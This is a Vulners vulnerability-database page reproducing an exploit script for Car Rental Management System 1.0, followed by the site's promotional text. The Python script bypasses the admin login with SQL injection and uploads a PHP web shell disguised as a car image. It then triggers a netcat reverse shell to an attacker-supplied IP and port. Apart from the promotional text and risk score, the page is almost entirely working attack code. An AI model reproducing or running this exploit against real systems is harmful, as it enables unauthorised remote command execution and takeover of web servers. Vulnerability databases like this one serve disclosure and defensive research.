Vulners
Lucene search
Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload
# Exploit Title: Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload
# Date: 09-11-2020
# Exploit Author: Fortunato Lodari [fox at thebrain dot net]
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Debian 10 with apache2
# This script will perform an automatic login using sql injection "'OR 1 = 1 limit 1 #" and will create a new car
# in the archive, assigning a PHP file instead of the image of the car itself. This car, having "AAAAAAAAAAA"
# as a brand, will be the first among those displayed and we will use the file just uploaded with a phpshell
# on the victim system
#
# on the Attacker machine you must listen with NC on a port
import sys
import requests
import time
import random
import http.cookiejar
import os.path
from os import path
#foxlox#
payload = {"username":"' OR 1=1 limit 1#","password":"moana"}
proxies = { "http": "http://localhost:8080"}
#payload = "username=' OR 1=1 limit 1 #&password=ciao"
def deb(str):
print("Debug => "+str)
def login():
deb("Login...")
session=requests.Session()
url = mainurl+"/admin/ajax.php?action=login"
#{'user-agent':'cagnolo','Referer':'http://192.168.0.130/car_rental/admin/login.php'}
r=session.post(url,payload, allow_redirects=False,proxies=proxies)
cookie = r.headers["Set-Cookie"]
deb(cookie)
return cookie
def find_all(a_str, sub,lbegin,lend):
start = 0
start = a_str.find(sub, start)
t=(a_str[start+lbegin:start+lend]).replace('"','')
return t
def upload(c):
deb("Getting cookie")
c = c.split("=");cookie={c[0]:c[1]}
deb("Sending payload")
filetosend=files = {'img': ('s_hell.php', '<?php\necho system($_GET["cmd"]);\n?>\n')}
fields={"id":"", "brand":"aaaAAAAAAAAAAAAAA", "model":"model", "category_id":"3", "engine_id":"1", "transmission_id":"2", "description":"description", "price":"0", "qty":"0", "img":""}
r=requests.post(mainurl+'/admin/ajax.php?action=save_car',fields,cookies=cookie,allow_redirects=False,files=filetosend)
deb("Saved Machine");
r=requests.get(mainurl+'/admin/index.php?page=cars', cookies=cookie,allow_redirects=False)
mid=find_all(r.content,'data-id=',8,11)
deb("Machine id: "+mid)
r=requests.get(mainurl+'/admin/index.php?page=manage_car&id='+mid, cookies=cookie,allow_redirects=False)
defurl=(find_all(r.content,"assets/uploads/cars_img",0,45))
deb("Exploit url: "+defurl)
#os.system("firefox "+mainurl+"/admin/"+defurl+"?cmd=id")
exploit = "wget '"+mainurl+"/admin/"+defurl+'?cmd=nc '+sys.argv[2]+" "+sys.argv[3]+" -e /bin/bash' -O /dev/null"
print("Opening url: "+exploit)
print("Don't forget to run: nc -nvlp "+sys.argv[3])
os.system(exploit)
def usage():
if len(sys.argv) < 4:
print("Create a PHPShell for Car Rental Management System")
print("example:")
print("python exploit_CMS_Car_management_system.py URL_BASE YOURIP YOURPORT")
exit()
usage()
mainurl = sys.argv[1]
upload(login())
#foxData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Nov 2020 00:00Current
7.4High risk
Vulners AI Score7.4